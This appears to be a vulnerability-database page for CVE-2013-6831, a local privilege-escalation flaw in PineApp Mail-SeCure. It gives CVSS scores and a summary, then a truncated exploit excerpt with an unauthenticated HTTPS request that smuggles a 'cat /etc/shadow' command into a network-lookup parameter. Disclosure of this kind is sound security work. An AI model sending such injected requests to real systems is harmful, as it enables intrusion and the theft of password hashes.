7.2
CVSSv2

CVE-2013-6831

Published: 20/11/2013 Updated: 25/11/2013
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 725
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

PineApp Mail-SeCure 3.70 and previous versions on 5099SK and previous versions platforms has a sudoers file that does not properly restrict user specifications, which allows local users to gain privileges via a sudo command that leverages access to the qmailq account.

Vulnerable Product Search on Vulmon Subscribe to Product

pineapp mail-secure 5099sk

Exploits

----------------------------------------------------------------- It is possible execute any command bash as qmailq unprivilege user, sending only the following https request, without authentication 1921682424:7443/admin/confnetworkinghtml?cmd=nslookup&hostip=&nstype=any&nsserver=wwwgooglees;%20cat%20/etc/shadow To uploa ...